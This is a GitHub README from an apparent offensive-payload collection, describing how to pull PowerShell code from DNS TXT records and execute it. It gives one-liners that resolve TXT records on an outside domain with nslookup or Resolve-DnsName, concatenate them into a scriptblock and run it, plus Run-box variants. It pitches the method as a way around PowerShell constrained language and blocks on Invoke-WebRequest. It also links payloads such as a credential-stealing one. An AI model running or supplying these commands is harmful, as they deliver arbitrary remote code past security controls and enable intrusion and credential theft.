Skip to content

Latest commit

 

History

History
161 lines (108 loc) · 4.96 KB

ns-lookup.md

File metadata and controls

161 lines (108 loc) · 4.96 KB

Logo

Table of Contents
  1. Description
  2. The Commands
  3. Examples
  4. Contact
  5. Acknowledgments

NS-Lookup

Python
YouTube Tutorial

Description

This concept was introduced to me VIA my friend Alh4zr3d on twitter

This abuses the ability to pull down dns txt records from a website and execute the output

This is especially helpful on systems using powershell constrained language and blocking Invoke-WebRequest or Invoke-Expression

Commands

The following commands will be referencing the DNS TXT Records shown in the below image

Python

[Single TXT Record Execution]

This nslookup example is how I was introduced to this concept originally.

It is used to pull down a single TXT Record and execute it

example is referencing one of the DNS TXT Records in the image above.

Replace it with the name of your TXT Record and replace the website URL with your own

This will execute a simple echo command to show it works

powershell . (nslookup -q=txt example.iamjakoby.com)[-1]

More complex payloads are of course possible.

Running the following example below will make you automatically subscribe to my youtube channel (you should try it)

powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]

Take NOTE

The previous examples will only work when executed in a powershell window.

If it is your intention to use them in the Run Box they have to be modified as follows:

powershell "powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]"

[Multiple TXT Record Execution]

The issue with pulling down a single TXT Record is they have a character limit of 255

So in order to execute longer scripts you have to pull down multiple records and combine them

The following modified verion I wrote will do just that

1..3 refers to DNS TXT Records 1, 2, and 3 in the image above.

This will pull them down in that order and combine then execute them

1..3|%{$p+=Resolve-DnsName "$_.iamjakoby.com." -Ty TXT |% S*s};& ([scriptblock]::Create($p))

Like this first example however there needs to be a modification to use it in the Run Box

The " " need to escaped with a \ for it to function as intended

powershell 1..3|%{$p+=Resolve-DnsName \"$_.iamjakoby.com.\" -Ty TXT -EA 0|% S*s};& ([scriptblock]::Create($p))

(back to top)

Examples

Listed below are payloads that can use one of these commands:

Acid Burn

JumpScare

WallPaper-Troll

Credz-Plz

(back to top)

Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Golang
Instagram 		Jsonnet
Discord

(back to top)

Acknowledgments

HOME-PAGE

(back to top)